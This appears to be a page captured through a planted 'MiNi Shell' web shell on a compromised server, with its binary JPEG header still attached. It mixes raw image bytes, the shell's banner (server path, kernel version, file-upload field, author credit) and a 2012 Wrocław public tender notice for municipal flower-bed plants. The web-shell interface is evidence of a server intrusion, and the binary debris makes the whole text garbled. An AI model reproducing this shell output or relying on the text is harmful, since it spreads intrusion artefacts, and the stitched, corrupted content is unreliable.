JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120202/31852-N-2012.html

<p class="kh_header"><b>Wrocław: Dostawa materiału roślinnego do obsadzeń kwietników na terenach zieleni miejskiej we Wrocławiu</b><br>
<b>Numer ogłoszenia: 31852 - 2012; data zamieszczenia: 02.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Zieleni Miejskiej , ul. Trzebnicka 33, 50-231 Wrocław, woj. dolnośląskie, tel. 071 3286611/12, faks 071 3286611/12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzm.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiału roślinnego do obsadzeń kwietników na terenach zieleni miejskiej we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
Dostawa materiału roślinnego do obsadzeń kwietników na terenach zieleni miejskiej we Wrocławiu z podziałem na trzy zadania:.

Zadanie I	       parki i zieleńce - rejon: Stare Miasto,
Zadanie II      parki i zieleńce - rejon: Śródmieście,                             
Zadanie III     parki i zieleńce - rejon Krzyki III, Fabryczna I i III,
zieleń przyuliczna - rejon: Śródmieście 
Urząd Miejski - Sukiennice, Urząd Stanu Cywilnego,
Muzeum Miejskie - Arsenał, Ratusz                         
                                   
Zamówienie obejmuje dostawę materiału roślinnego do obsadzenia letniego i jesienno - wiosennego kwietników sezonowych w poszczególnych zadaniach.

Zadanie I
Parki i zieleńce - Rejon: Stare Miasto, kwietniki o łącznej powierzchni ok. 14,62 ara w nw. obiektach:
Park Słowackiego
Park Kopernika
Plac Wolności
Plac Powstańców Warszawy
Plac Dominikański
ul. Oławska
ul. Świdnicka + Opera Wrocławska
ul. Leszczyńskiego
ul. Szewska + przy kościele św. Marii Magdaleny
gazony przy kościele św. Elżbiety
ul. Św. Ducha
Wyspa Piaskowa (Bulwar Piotra Włosta)
Zieleń Ostrowa Tumskiego
Most Uniwersytecki/ Drobnera
Bulwar Wyszyńskiego
pl. Kościuszki

Zadanie II
Parki i zieleńce - Rejon: Śródmieście, kwietniki o łącznej powierzchni 14,48 ara w nw. obiektach:
Park Szczytnicki
Kwietniki i gazony przy Hali Stulecia

Zadanie III
Parki i zieleńce - Rejon Krzyki III (4,64 ara), Fabryczna I i III (3,83 ara), o łącznej powierzchni kwietników 8,47 ara w nw. obiektach:
Park Południowy
Park Klecina
Park Grabiszyn
Zieleniec przy ul. Wróbla
Zieleniec przy ul. Anielewicza
Plac Wiślany
Zieleń przyuliczna - Rejon: Śródmieście (gazony), o łącznej powierzchni 0,16 ara w nw. obiektach:
ul. Polaka
ul. Nowowiejska/Sienkiewicza
ul. Bujwida
Dostawa roślin z obsadzeniem pojemników: skrzynek kwiatowych i gazonów:
Urząd Miejski: - Sukiennice: skrzynki kwiatowe - 114 szt., gazony 2 szt.
                     - Urząd Stanu Cywilnego - gazony (średnica 50cm) 6 szt.
Muzeum Miejskie: - Arsenał: skrzynki kwiatowe: -  6 szt. - 40 cm
 					- 10 szt. - 60 cm
					-   2 szt. - 80 cm
	            - Ratusz: skrzynki kwiatowe:  - 10 szt. - 60 cm
 					- 23 szt. - 60 cm

2.  Zamówienie nie obejmuje zakupu skrzynek kwiatowych, gazonów.
3. Asortyment, ilość materiału roślinnego dla poszczególnych zadań zawierają wzory kosztorysów ofertowych dla każdego zadania oddzielnie (Załącznik nr 6 do SIWZ).
4. Wymagania jakościowe dla wszystkich gatunków roślin kwietnikowych zgodnie z normą: BN-76/9125-01;
a)  rośliny powinny być w pierwszym wyborze, gatunki ozdobne z kwiatów wykwitnięte w 50 %, dojrzałe technicznie, jednolite w całej partii, zdrowe, niezwiędnięte,
b) pokrój roślin, barwa kwiatów i liści powinny być charakterystyczne dla gatunku i odmiany,
c) stopień rozwoju wielkość i sposób uformowania powinny być jednakowe w całej partii,
d) bryła korzeniowa powinna być dobrze przerośnięta korzeniami, wilgotna,
nieuszkodzona,
e) niedopuszczalne jest występowanie w partii roślin innych gatunków i odmian,
f) niedopuszczalne jest występowanie na roślinach chorób, szkodników i śladów porażenia przez choroby czy szkodniki,
g) rośliny nie powinny wykazywać uszkodzeń mechanicznych,
h) materiał roślinny do obsadzeń letnich w kontenerach, do obsadzeń jesienno-wiosennych z bryłą korzeniową.
5. Przed przystąpieniem do realizacji zadania Zamawiający dokona kwalifikacji materiału roślinnego w obecności Wykonawcy i Wykonawcy nasadzeń na miejscu sadzenia. 
6. Transport materiału roślinnego:
a)  koszt transportu i rozładunku wliczony jest w cenę materiału roślinnego,
b)  Wykonawca własnym  transportem dostarczy materiał roślinny na miejsce sadzenia, w terminie uzgodnionym z Zamawiającym na bieżąco,     
c)  Wykonawca powinien zabezpieczyć rośliny w czasie transportu przed  uszkodzeniami i niekorzystnymi warunkami atmosferycznymi (rośliny powinny być ocienione, osłonięte od wiatru i zabezpieczone przed wyschnięciem).
7. Nasadzeń dostarczonego materiału dokonywać będą firmy wyłonione odrębnym przetargiem na konserwację i utrzymanie terenów zieleni miejskiej z wyłączeniem obiektów: Urząd Miejski - Sukiennice, Urząd Stanu Cywilnego, Muzeum Miejskie - Arsenał, Ratusz. 
Wykaz firm dokonujących nasadzeń zawiera załącznik nr 7 do SIWZ. 

Pozostałe warunki zamówienia zawarte są w Projekcie umowy (Załącznik nr 5 do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w rozumieniu art. 67 ust. 1 pkt. 6 ustawy Pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości:
Zadanie I:   2800 zł (słownie: dwa tysiące osiemset złotych), 
Zadanie II:  2500 zł (słownie: dwa tysiące pięćset złotych),
Zadanie III: 2600 zł (słownie: dwa tysiące sześćset złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy, którzy wykażą brak podstaw do wykluczenia z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp oraz spełniają warunki określone w przepisie art. 22 ust. 1 ustawy Pzp, a w szczególności posiadają niezbędną wiedzę i doświadczenie, dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia oraz znajdują
się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Wykonawca musi spełniać następujące warunki:
-  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje, z należytą starannością, co najmniej jedno zamówienie odpowiadające swoim rodzajem przedmiotowi zamówienia o wartości nie mniejszej niż: 100 000 zł brutto dla zadania I, 80 000 zł brutto dla zadania II, 100 000 zł brutto dla zadania III; wartość, rodzaj i należyte wykonanie winny być potwierdzone dokumentem (np. referencje). 

2. Ocena spełniania w/w warunku dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w dziale VIII SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił. 

Wykonawca, w zakresie wskazanym przez Zamawiającego, zobowiązany jest wykazać nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art.22 ust.1 ustawy Pzp, oraz brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art.24 ust.1 ustawy Pzp (art.26 ust. 2a ustawy Pzp).

3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art.26 ust. 2b ustawy Pzp).

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 23 ust.1 ustawy Pzp). Za podmioty występujące wspólnie uważa się spółki cywilne oraz konsorcja. 
W tym przypadku Wykonawcy ustanawiają pełnomocnika (art. 23 ust. 2 ustawy Pzp).  Wykonawcy ubiegający się wspólnie o udzielenie niniejszego zamówienia ponoszą solidarną odpowiedzialność względem Zamawiającego za należyte wykonanie umowy. 
W przypadku, gdy zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni do przedstawienia, przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.              

Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. kosztorys ofertowy, 
2. pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W trakcie realizacji umowy postanowienia umowy mogą ulec zmianom, jeżeli zmiany będą korzystne dla Zamawiającego, lub konieczność wprowadzenia zmian wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, przy czym zmiany postanowień umowy dotyczyć mogą w szczególności:
1) terminu realizacji przedmiotu umowy przy czym zmiana spowodowana może być okolicznościami leżącymi wyłącznie po stronie Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy, takimi jak np. warunki atmosferyczne (opady deszczu),
2)  oznaczenia danych dotyczących Zamawiającego i Wykonawcy.
2.Wprowadzenie zmiany postanowień umowy wymaga aneksu sporządzonego w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzm.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Zieleni Miejskiej, ul. Trzebnicka 33, 50-231 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2012 godzina 10:00, miejsce: Zarząd Zieleni Miejskiej, ul. Trzebnicka 33, 50-231 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiału roślinnego do obsadzeń kwietników na terenach zieleni miejskiej we Wrocławiu - Zadanie I parki i zieleńce - rejon: Stare Miasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I
Parki i zieleńce - Rejon: Stare Miasto, kwietniki o łącznej powierzchni ~ 14,62 ara w nw. obiektach:
Park Słowackiego
Park Kopernika
Plac Wolności
Plac Powstańców Warszawy
Plac Dominikański
ul. Oławska
ul. Świdnicka + Opera Wrocławska
ul. Leszczyńskiego
ul. Szewska + przy kościele św. Marii Magdaleny
gazony przy kościele św. Elżbiety
ul. Św. Ducha
Wyspa Piaskowa (Bulwar Piotra Włosta)
Zieleń Ostrowa Tumskiego
Most Uniwersytecki/ Drobnera
Bulwar Wyszyńskiego
pl. Kościuszki


Materiał roślinny należy dostarczać w terminach:
- do obsadzeń letnich: od 15.05.2012 r. do 30.05.2012 r., 
- do obsadzeń jesienno-wiosennych: 10.09.2012 r. do 05.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiału roślinnego do obsadzeń kwietników na terenach zieleni miejskiej we Wrocławiu - Zadanie II parki i zieleńce - rejon: Śródmieście.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Parki i zieleńce - Rejon: Śródmieście, kwietniki o łącznej powierzchni 14,48 ara w nw. obiektach:
Park Szczytnicki
Kwietniki i gazony przy Hali Stulecia 
Materiał roślinny należy dostarczać w terminach:
- do obsadzeń letnich: od 15.05.2012 r. do 30.05.2012 r., 
- do obsadzeń jesienno-wiosennych: 10.09.2012 r. do 05.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiału roślinnego do obsadzeń kwietników na terenach zieleni miejskiej we Wrocławiu - Zadanie III  parki i zieleńce - rejon Krzyki III, Fabryczna I i III,
zieleń przyuliczna - rejon: Śródmieście 
Urząd Miejski - Sukiennice, Urząd Stanu Cywilnego,
Muzeum Miejskie - Arsenał, Ratusz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiał roślinny należy dostarczać w terminach:
1. Parki i zieleńce - rejon Krzyki III, Fabryczna I i III
2. Zieleń przyuliczna - rejon: Śródmieście
3. Urząd Miejski - Sukiennice, Urząd Stanu Cywilnego, Muzeum Miejskie - Arsenał, Ratusz
 - do obsadzeń letnich: od 15.05.2012 r. do 30.05.2012 r., 
   za wyjątkiem roślin : Sedum Album Coral Carpet - 800 szt, Sedum Acre Yellow Queen - 800 szt, Sempervivum tectorum - 1000 szt i Sempervivum tectorum Purpureum - 600 szt, dla zadania III Fabryczna I - Logo Euro, które należy dostarczyć w terminie od 16.04.2012 r.  do 25.04.2012 r.
 - do obsadzeń jesienno-wiosennych: 10.09.2012 r. do 05.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com